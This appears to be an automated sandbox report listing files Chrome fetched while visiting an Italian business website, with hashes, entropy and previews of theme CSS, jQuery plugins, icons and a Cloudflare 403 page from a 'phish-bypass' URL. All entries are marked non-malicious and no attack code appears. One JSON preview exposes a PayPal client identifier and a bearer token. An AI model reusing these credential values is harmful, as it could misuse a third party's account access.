                                                                                                                                              Preview:/* ======================================================================================================================================================.ICONGRID.====================================================================================================================================================== */....avia-icongrid{. margin: 0;. padding: 0;. list-style: none;. display: block;. width: 100%;.}...avia-icongrid-borders-all{. border-width: 1px;. border-style: solid;.}...avia-icongrid li{. display: block;. float: left;. margin: 0;. padding: 0;. list-style: none;. text-align: center;. position: relative;.}....avia-icongrid-icon{. font-size: 42px;. line-height: 1;. margin-bottom: 0.5em;. color: initial;.}...avia-icongrid li .avia-icongrid-wrapper{. position: relative;. display: block;.}...avia-icongrid-borders-all li .avia-icongrid-wrapper:before,..avia-icongrid-borders-between li .avia-icongrid-wrapper:before {. c
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):27249
                                                                                                                                              Entropy (8bit):5.102725454034097
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:/Lvzx7nLva60vui7HLvdSPkPMTkIbViSQUFatwpJpi8WJi:/LvlLvcrLv4pxVJJpi8Wc
                                                                                                                                              MD5:359ACA8A88B2331AA34AC505ACAD9911
                                                                                                                                              SHA1:800A4F56BB87049E1F0D45CF93C4E8EF79144B45
                                                                                                                                              SHA-256:655AE452D922F501B62C7028FC35E238138DE989387381CC1ED9CEA9085864DB
                                                                                                                                              SHA-512:694429B843B8BE04FFE5DEBB9DB48F45E02767F4B6AE177A5DF372F9AC26271FC0F969398AFF382DB631EDEA8547CC50F24EB470C21C750D507544D056550702
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/plugins/cookie-law-info/legacy/public/css/cookie-law-info-gdpr.css?ver=3.0.5
                                                                                                                                              Preview:.gdpr-container-fluid {..width: 100%;..padding-right: 15px;..padding-left: 15px;..margin-right: auto;..margin-left: auto;.}..gdpr-row {..display: -ms-flexbox;..display: flex;..-ms-flex-wrap: wrap;..flex-wrap: wrap;..margin-right: -15px;..margin-left: -15px;.}..gdpr-col-4 {..-ms-flex: 0 0 33.333333%;..flex: 0 0 33.333333%;..max-width: 33.333333%;.}..gdpr-col-8 {..-ms-flex: 0 0 66.666667%;..flex: 0 0 66.666667%;..max-width: 66.666667%;.}..gdpr-align-items-stretch {..-ms-flex-align: stretch!important;..align-items: stretch!important;.}..gdpr-d-flex {..display: -ms-flexbox!important;..display: flex!important;.}..gdpr-px-0 {..padding-left: 0;..padding-right: 0;.}..modal-backdrop.show {..opacity: .8;.}..modal-open {..overflow: hidden.}...modal-open .gdpr-modal {..overflow-x: hidden;..overflow-y: auto.}...gdpr-modal.fade .gdpr-modal-dialog {..transition: -webkit-transform .3s ease-out;..transition: transform .3s ease-out;..transition: transform .3s ease-out,-webkit-transform .3s ease-out;..-w
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):706
                                                                                                                                              Entropy (8bit):5.683510979851918
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:YET/HnhTjQ+LpqpGeKaA8EwBQfvYKiZz66DGiNonavYKTNu9cp/oadk2QBld4:YErB3QKYpjZ/EwBH5ZDDGJaQaNu9cp/t
                                                                                                                                              MD5:56B356057CFC679F620E3C154120DE2C
                                                                                                                                              SHA1:B825A2F27A647B12ABFD68FBB81E6B1D42C1E256
                                                                                                                                              SHA-256:01A49B3A0028AC87F225F82D71DE9422AF3E519A42AB2F04F35B471B40D5B4C6
                                                                                                                                              SHA-512:5E1A879C2C3C1E17555B1340E891D47DD647209BE027B5446A9AA9E9CE945F59E3DF6EBA54BFEDE61B06BCBD22D0CA3C2113034D631D103B7EC2277D52A1CC0B
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://enginev2.pienissimo.com/open/getFormsAuthV2/?hashform=UZuyPFB7D33R7lvcjvW37OHaRuQxWlgK&doNotCheckUser=true
                                                                                                                                              Preview:{"data":"[{\"ragiona_sociale\":\"CIPASSO Roma\",\"nome_schema_db\":\"user_253\",\"cod_univoco\":\"47667869\",\"cod_cliente\":252,\"numero_versione_informativa\":\"1\",\"result\":\"OK\",\"remarketing\":true,\"paypal\":\"AarcVjPXz7SzNcLKnN1nBimL_9gU_ikqivx78L2wiTM5Is7h7PRtCt9QXdZzbXFLFD79HNDhjZFSYOYM\",\"stripe\":null,\"satispay\":{\"token\":\"\"},\"hashform\":\"uzuypfb7d33r7lvcjvw37oharuqxwlgk\",\"link_informativa\":\"https://privacy-pienissimo.s3.eu-central-1.amazonaws.com/informativa/uzuypfb7d33r7lvcjvw37oharuqxwlgk/index.html?page=1\",\"token\":\"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJjaGVjayI6dHJ1ZSwiaWF0IjoxNzM1OTE5MTkxLCJleHAiOjE3MzU5MjA5OTF9.7ceUSoELsrL7n3AilHr9tI7rGluvk64qCVNKUYcgjUA\"}]"}
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):43
                                                                                                                                              Entropy (8bit):2.7374910194847146
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:CU9yltxlHh/:m/
                                                                                                                                              MD5:DF3E567D6F16D040326C7A0EA29A4F41
                                                                                                                                              SHA1:EA7DF583983133B62712B5E73BFFBCD45CC53736
                                                                                                                                              SHA-256:548F2D6F4D0D820C6C5FFBEFFCBD7F0E73193E2932EEFE542ACCC84762DEEC87
                                                                                                                                              SHA-512:B2CA25A3311DC42942E046EB1A27038B71D689925B7D6B3EBB4D7CD2C7B9A0C7DE3D10175790AC060DC3F8ACF3C1708C336626BE06879097F4D0ECAA7F567041
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:Unicode text, UTF-8 text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):7813
                                                                                                                                              Entropy (8bit):4.843759246435122
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:hXgeYzGBIPrEuG9LSWb91BXitptrYGS3M6:hgeYzMgRG9dEtriM6
                                                                                                                                              MD5:9E8F00CF421DFC22847BC5D22834B45E
                                                                                                                                              SHA1:ADF8D36362B5313B3BEDDF5642109DDB8E5BBB09
                                                                                                                                              SHA-256:E57EC9E9ED2249AA9614B2782F4D435EB10116B001D94BD83B99FD83BBA18B08
                                                                                                                                              SHA-512:B792A12B8160BADA54D0264F16DB2B0DC3BFFF663C1D77E69B7E692B9E78B8FDDE507BD7D757CD918F6B21FBE2B8AD3C71FF2D13F824E740E977D15AABB7D9C0
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:// -------------------------------------------------------------------------------------------.// contact form ajax.// -------------------------------------------------------------------------------------------..(function($).{..$.fn.avia_ajax_form = function(variables)..{....var defaults =...{....sendPath: 'send.php',....responseContainer: '.ajaxresponse'...};....var options = $.extend(defaults, variables);....return this.each(function()...{....var form = $(this),.....form_sent = false,.....send =.....{......formElements: form.find('textarea, select, input[type=text], input[type=checkbox], input[type=hidden]'),......validationError:false,......button : form.find('input:submit'),......dataObj : {}.....},......responseContainer = form.next(options.responseContainer+":eq(0)");......send.button.on('click', checkElements);...............//change type of email forms on mobile so the e-mail keyboard with @ sign is used.....if($.avia_utilities.isMobile).....{......send.formElements.each(functi
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):5162
                                                                                                                                              Entropy (8bit):5.3503139230837595
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
                                                                                                                                              MD5:7977D5A9F0D7D67DE08DECF635B4B519
                                                                                                                                              SHA1:4A66E5FC1143241897F407CEB5C08C36767726C1
                                                                                                                                              SHA-256:FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
                                                                                                                                              SHA-512:8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
                                                                                                                                              Preview:.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (36994), with no line terminators
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):36994
                                                                                                                                              Entropy (8bit):5.231190304828876
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:qHxbLj7qlNojIO+9CLVWWOd8LqGt7Zen5nysGqR4iXiq1GIQxJOEF7TwpPZIL4UY:9NojTDzJSitOTT
                                                                                                                                              MD5:DB6B7A89CFFD08FF887132AA538F47E9
                                                                                                                                              SHA1:CAD3129C71535BAAAB25AC06D8429734959B0B3F
                                                                                                                                              SHA-256:C1E8450E0DD30BB40A178A67B82BBDA805668BA777D0C8040941CE88D5056F4E
                                                                                                                                              SHA-512:4E24B7FC8453474AA89E434EAA23005086901870CE3C883D2D213FDF370A3E6200DBDDF2703FBA9227152F1CD440660569A7D1CC652E956373B8333E9E4AE3D8
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://forms.pienissimo.com/polyfills-es2015.6022d6f28e0500e60d30.js
                                                                                                                                              Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[2],{2:function(e,t,n){e.exports=n("hN/g")},"hN/g":function(e,t,n){"use strict";n.r(t),n("pDpN")},pDpN:function(e,t,n){var o,r;void 0===(r="function"==typeof(o=function(){"use strict";!function(e){const t=e.performance;function n(e){t&&t.mark&&t.mark(e)}function o(e,n){t&&t.measure&&t.measure(e,n)}n("Zone");const r=e.__Zone_symbol_prefix||"__zone_symbol__";function s(e){return r+e}const a=!0===e[s("forceDuplicateZoneCheck")];if(e.Zone){if(a||"function"!=typeof e.Zone.__symbol__)throw new Error("Zone already loaded.");return e.Zone}class i{constructor(e,t){this._parent=e,this._name=t?t.name||"unnamed":"<root>",this._properties=t&&t.properties||{},this._zoneDelegate=new l(this,this._parent&&this._parent._zoneDelegate,t)}static assertZonePatched(){if(e.Promise!==C.ZoneAwarePromise)throw new Error("Zone.js has detected that ZoneAwarePromise `(window|global).Promise` has been overwritten.\nMost likely cause is that a Promise polyfill has b
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):1432
                                                                                                                                              Entropy (8bit):4.541846526034853
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:zOw+YowDarA3MJ5ggwoNAqrfXUZd6BUsCbg8:zOXuDaU34wEAqrPUiiVbg8
                                                                                                                                              MD5:62D053EF68A8DCE3A6595396086E192E
                                                                                                                                              SHA1:5A5FE6E0C60D515CFAB5B0CF9A3FE2A83D01D8B1
                                                                                                                                              SHA-256:8DED5C193148B101466930D55F68FDAB3D3580145476210D4CBE814395798A50
                                                                                                                                              SHA-512:00D4BDD7D6573EABC0F9AA7A0B9E7E4433C9B3B7D1254A909A26212D265805EFF5A8EC0459770346DCEB57011EF94AEC161EB38CB1553C87E1E422DFD4ABAFDA
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/catalogue/catalogue.css?ver=6.0.9
                                                                                                                                              Preview:/* ======================================================================================================================================================.Catalogue.====================================================================================================================================================== */...av-catalogue-container{margin:30px 0;}..av-catalogue-heading{ text-align: center; padding-bottom: 15px; font-weight: normal; letter-spacing: 1px;}..av-catalogue-list{ border-top: 1px dashed; margin:0;}..av-catalogue-list li{list-style-type: none; margin:0; border-bottom: 1px dashed; padding:0; clear:both;}.#top .av-catalogue-item{text-decoration: none; padding:10px 5px; display: block; overflow: hidden; }.div.av-catalogue-item:hover{cursor:default;}..av-catalogue-title-container{position: relative; font-size: 1.3em; line-height: 1.4em;}..av-catalogue-title{padding-right:60px; text-transform: uppercase; }..av-catalogue-price{position: absolute; right:0; top:0;}...av-catal
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):225
                                                                                                                                              Entropy (8bit):4.949449059609909
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:tI9mc4sltj4JEqgRtuuHWs5uRtwi5uRtDICMq2:t438gf37ufZufsX/
                                                                                                                                              MD5:859F18A5ACFD4E8D702A9B3D539DFD2D
                                                                                                                                              SHA1:4B0135F6AEEEA3F5D3CF75A388928F2DA6D40DFD
                                                                                                                                              SHA-256:D601FCC2E5B1FD48B79D53C55108AF4C0E90793F146DB51F3EE449D8D69512BC
                                                                                                                                              SHA-512:A79B7D6D94E0942D2CD082B93C831A5E2BFEEED9C81D87B0B20CE01A8DF42D0B33900B7B0A88E84322F0411ADC85AC3D84A3CA581F1C3A4282E8F350493DB1E4
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" id="flag-icons-cz" viewBox="0 0 640 480">. <path fill="#fff" d="M0 0h640v240H0z"/>. <path fill="#d7141a" d="M0 240h640v240H0z"/>. <path fill="#11457e" d="M360 240 0 0v480z"/>.</svg>.
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (11126)
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):11224
                                                                                                                                              Entropy (8bit):5.2603128465032745
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:JrprDNvD66fPP/+I6OP1fQP0OIr96DB6MHXcwr1RF:JrprxG6fPP3P1fQMOIsDsMMS
                                                                                                                                              MD5:79B4956B7EC478EC10244B5E2D33AC7D
                                                                                                                                              SHA1:A46025B9D05E3DF30D610A8AEF14F392C7058DC9
                                                                                                                                              SHA-256:029E0A2E809FD6B5DBE76ABE8B7A74936BE306C9A8C27C814C4D44AA54623300
                                                                                                                                              SHA-512:217F86FEE871FA36ECA4F25830E3917C7BF57A681140B135C508AA32F2A1E3EFF5A80661F3B5BA46747D0C305AF10B658D207F449550F3D417D9683216FEEA8F
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:/*! jQuery Migrate v3.3.2 | (c) OpenJS Foundation and other contributors | jquery.org/license */."undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){return t(e,window)}):"object"==typeof module&&module.exports?module.exports=t(require("jquery"),window):t(jQuery,window)}(function(s,n){"use strict";function e(e){return 0<=function(e,t){for(var r=/^(\d+)\.(\d+)\.(\d+)/,n=r.exec(e)||[],o=r.exec(t)||[],i=1;i<=3;i++){if(+o[i]<+n[i])return 1;if(+n[i]<+o[i])return-1}return 0}(s.fn.jquery,e)}s.migrateVersion="3.3.2",n.console&&n.console.log&&(s&&e("3.0.0")||n.console.log("JQMIGRATE: jQuery 3.0.0+ REQUIRED"),s.migrateWarnings&&n.console.log("JQMIGRATE: Migrate plugin loaded multiple times"),n.console.log("JQMIGRATE: Migrate is installed"+(s.migrateMute?"":" with logging active")+", version "+s.migrateVersion));var r={};function u(e){var t=n.console;s.migrateDeduplicateWarnings&&r[e]||(r[e]=!0
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):18
                                                                                                                                              Entropy (8bit):3.5724312513221195
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:uZuUeB:u5eB
                                                                                                                                              MD5:53AF239EE5D3E261545DEDEDCB6FFD57
                                                                                                                                              SHA1:04CA7E137E1E9FEEAD96A7DF45BB67D5AB3DE190
                                                                                                                                              SHA-256:99EB12F2AB3C4866A353E098FFA3CB7A967E617C49B98480394EC5D8EA92B094
                                                                                                                                              SHA-512:C734E4A5FF5D335A91518DBF47861BDAF8012AF49371DCD2E3350E269C9A5A1CC094114D17C4F5B053F3757B4B07487EBD0D309C91EF97ACF4665CC5D5C9A2D3
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:404 page not found
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):5625
                                                                                                                                              Entropy (8bit):4.878273363741113
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:wnrW+bBUZafeWmSip+GWRRc5Zor5ZJkf1Cr6HWVwer:wC2UZafeWg+GWQmJkCr6C
                                                                                                                                              MD5:186D34DB6D4ACC17DC4E66BEE448BAD3
                                                                                                                                              SHA1:76592404E604D0C90496D56372825A7EE725A1E6
                                                                                                                                              SHA-256:080705ED953BE6AD5A5F2E37205DD7A45EE534D68A193479235DB9DAB459B0FB
                                                                                                                                              SHA-512:1DF76EFE5C250251850194B7BA944540EBA250DEC60E56B430EA0E8B4DC1E5469ACEAA3FADB2A8973A0D65783AE094F32FC10015F89E81CDD1884403AD4BEF38
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:// -------------------------------------------------------------------------------------------.// Fullscreen Slideshow .// .// extends avia slideshow script with a more sophisticated preloader and fixed size for slider.// -------------------------------------------------------------------------------------------..(function($).{. "use strict";...$.AviaFullscreenSlider = function(options, slider)..{.. this.$slider .= $( slider ); .. this.$inner. .= this.$slider.find('.avia-slideshow-inner');.. this.$innerLi.= this.$inner.find('>li');.. this.$caption .= this.$inner.find('.avia-slide-wrap .caption_container');.. this.$win. .= $( window );.. this.isMobile .= $.avia_utilities.isMobile;.. this.property .= {};.. this.scrollPos.= "0";.. this.transform3d= document.documentElement.className.indexOf('avia_transform3d') !== -1 ? true : false;.. this.ticking .= false; .. .. .. if($.avia_utilities.supported.transition === undefined)...{....$.avia_utiliti
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):1857
                                                                                                                                              Entropy (8bit):4.795103354238156
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:tg7ao5Nc45b+bkyMYKeEnr7Y9rNlFY4pJYwJcZ:tYZNcmqodnr7qr9T/JY
                                                                                                                                              MD5:F825436B26DD16D5BFB38691C3F285F8
                                                                                                                                              SHA1:5A5A4D0BC555C6FAF57F0EE624FFE74F54FBDD1A
                                                                                                                                              SHA-256:9C15F548ED74B91FB01011415681EFCC653D080F0FCEE95B0460BD9C2602B4FA
                                                                                                                                              SHA-512:56C690B8DBBD78AF2397B31AF9239F16956A57CF7C7964C480C3BEADB0DD1106D043908388068EA88C98D90CFA0BC88A06557D65132E844C7E4A3DC40B7DBB14
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/video/video.css?ver=6.0.9
                                                                                                                                              Preview:/* ======================================================================================================================================================.Video.====================================================================================================================================================== */...avia-video, .avia-iframe-wrap{clear:both; position: relative; margin-bottom:20px; }...avia-video, .avia-video iframe, .avia-video video{background-color: #000;}../*responsive iframe trick*/..avia-video iframe, .js_active .avia-iframe-wrap iframe, div .avia-video .avia-iframe-wrap{position: absolute; width:100%; height:100%; left:0; top:0; padding:0;}..avia-video-custom{height:0;}..avia-video-16-9, .js_active .avia-iframe-wrap{padding-bottom: 56.25%; height:0;}..avia-video-4-3{padding-bottom: 75%; height:0;}../*html 5 video - always has 100 width and natural height. behaves like image when it comes to aspect ratio*/..video{..width:100%;..height:auto;.}...mejs-layer {. z-ind
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (32004)
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):49143
                                                                                                                                              Entropy (8bit):5.137636357602033
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:9fyxzGdHc1zfA9ZVP4eAnmc6FumKSshD6cD6GLQfq9SvDz2d1FxSuWBlb7myLBK:Ux6dOjARP4Nnmc6FuCshD6cD6xS9ODzw
                                                                                                                                              MD5:F680B1A267329287C8ED3358EF7732EB
                                                                                                                                              SHA1:A11BE43086599CBC7BA370602C038161356F38B6
                                                                                                                                              SHA-256:986AFF2E526C11746107D4F08E128BC6BB8312C4750710BB4F673D7C52F9BA7B
                                                                                                                                              SHA-512:04DC2AE7FFDA9BE7C8A3B2BEC0DA219CFA08E322F932E336270B0C49DAA6569904ABC330E90F97B333D1AA98AF2B9FA492C0A4C6B7816ABFB3B263D26082F996
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/portfolio/isotope.js?ver=6.0.9
                                                                                                                                              Preview:/*!. * Isotope PACKAGED v3.0.5. *. * Licensed GPLv3 for open source use. * or Isotope Commercial License for commercial use. *. * https://isotope.metafizzy.co. * Copyright 2017 Metafizzy. */..!function(t,e){"function"==typeof define&&define.amd?define("jquery-bridget/jquery-bridget",["jquery"],function(i){return e(t,i)}):"object"==typeof module&&module.exports?module.exports=e(t,require("jquery")):t.jQueryBridget=e(t,t.jQuery)}(window,function(t,e){"use strict";function i(i,s,a){function u(t,e,o){var n,s="$()."+i+'("'+e+'")';return t.each(function(t,u){var h=a.data(u,i);if(!h)return void r(i+" not initialized. Cannot call methods, i.e. "+s);var d=h[e];if(!d||"_"==e.charAt(0))return void r(s+" is not a valid method");var l=d.apply(h,o);n=void 0===n?l:n}),void 0!==n?n:t}function h(t,e){t.each(function(t,o){var n=a.data(o,i);n?(n.option(e),n._init()):(n=new s(o,e),a.data(o,i,n))})}a=a||e||t.jQuery,a&&(s.prototype.option||(s.prototype.option=function(t){a.isPlainObject(t)&&(this.options=a.
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):13208
                                                                                                                                              Entropy (8bit):4.250198143484081
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:EMXzMZxBriAIqBh7A0XmPU2G+3ml7boWqXSUfvlhdUaBYmXQ1i:dqxJxIqBC0WPU2G+Wl78h7vfdemUi
                                                                                                                                              MD5:791B7ECF968525ABE7A4E9302B5024C0
                                                                                                                                              SHA1:6B8C060F1A70733BBF4CC9BDF22324F8C37E96AB
                                                                                                                                              SHA-256:3A7DC7BFF26B0FB5829B872E30A348933BBAB87CDF920DB9760A08913055F97B
                                                                                                                                              SHA-512:1CE5C1B7048DC47D8666562654EAC8BD23F188738D679AB8C06A420AE07491B5C9D18C69556EE89C47C16F3274B6F7E4CBE95592913674BE755F86585275E449
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:(function($) {.. 'use strict';.... /*-------------------------------------------------------------------------------.. Preloader...-------------------------------------------------------------------------------*/.. $(window).on('load', function() {.. $('.ct-preloader').addClass('hidden');.. });.... /*-------------------------------------------------------------------------------.. Aside Menu...-------------------------------------------------------------------------------*/.. $(".aside-trigger").on('click', function() {.. $(".main-aside").toggleClass('open');.. });.. $(".main-aside .menu-item-has-children > a").on('click', function(e) {.. var submenu = $(this).next(".submenu");.. e.preventDefault();.... submenu.slideToggle(200);.. }).... /*-------------------------------------------------------------------------------.. Cart Trigger.. -------------------------------------------------------------------------------*/.. $(".cart-trigger").on('click', function
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):553
                                                                                                                                              Entropy (8bit):4.662821081936326
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:TvgsoCVIogs01lI55aNGlTF5TF5TF5TF5TF5TFK:cEQtnstTPTPTPTPTPTc
                                                                                                                                              MD5:0127426BF3BA07FF7211399DDF5186C4
                                                                                                                                              SHA1:221D89F3261F545AC58848EBA300E0134C76FF9A
                                                                                                                                              SHA-256:982B986BB578E137F062099427A8CAEC3C501C84A9E4B22369EBD2BADEC42FE7
                                                                                                                                              SHA-512:6CEA4AB7D43A518A316120BF7AE340583E989A21FC3E142DDD71742D53A7AE6CFA276F232ACD6B6794444B28AA9A666C40171EE44341A7B9A3CA8453B61A371A
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://t3.awagama.org/cdn-cgi/phish-bypass?atok=5CxXRy3gIXYBSZxQYjr6WUagwEOFFlA0IN62CHhpDX0-1735922003-0.0.1.1-%2Fmima.mp4
                                                                                                                                              Preview:<html>..<head><title>403 Forbidden</title></head>..<body>..<center><h1>403 Forbidden</h1></center>..<hr><center>cloudflare</center>..</body>..</html>.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->..
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):482
                                                                                                                                              Entropy (8bit):4.626408410219915
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:t41WffFcfbpmO7+iCC4Mfiz9DI9T5VN5Tlp9jyuyuH+/:t414fFmpmOaiCC4MfWRsN19jyHYk
                                                                                                                                              MD5:212E30E47232BE03033A87DC58EDAA95
                                                                                                                                              SHA1:4D69C4A3DC57503E08B76C774135BFE83E8B1F51
                                                                                                                                              SHA-256:1F026BEB67630ABCDBC341651B1C17591AA76261296A9FB118793765964EB4E9
                                                                                                                                              SHA-512:13F153263DBF35F91793E8F3FE7249CE87C4854620C2D97F79646C70BBB2F71C5C3759496FFD101FBC6EF9657B19595FE782200649A96473BECD1AD7DAE1F72E
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://s.w.org/images/core/emoji/14.0.0/svg/2705.svg
                                                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 36 36"><path fill="#77B255" d="M36 32c0 2.209-1.791 4-4 4H4c-2.209 0-4-1.791-4-4V4c0-2.209 1.791-4 4-4h28c2.209 0 4 1.791 4 4v28z"/><path fill="#FFF" d="M29.28 6.362c-1.156-.751-2.704-.422-3.458.736L14.936 23.877l-5.029-4.65c-1.014-.938-2.596-.875-3.533.138-.937 1.014-.875 2.596.139 3.533l7.209 6.666c.48.445 1.09.665 1.696.665.673 0 1.534-.282 2.099-1.139.332-.506 12.5-19.27 12.5-19.27.751-1.159.421-2.707-.737-3.458z"/></svg>
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:PNG image data, 75 x 74, 8-bit/color RGB, non-interlaced
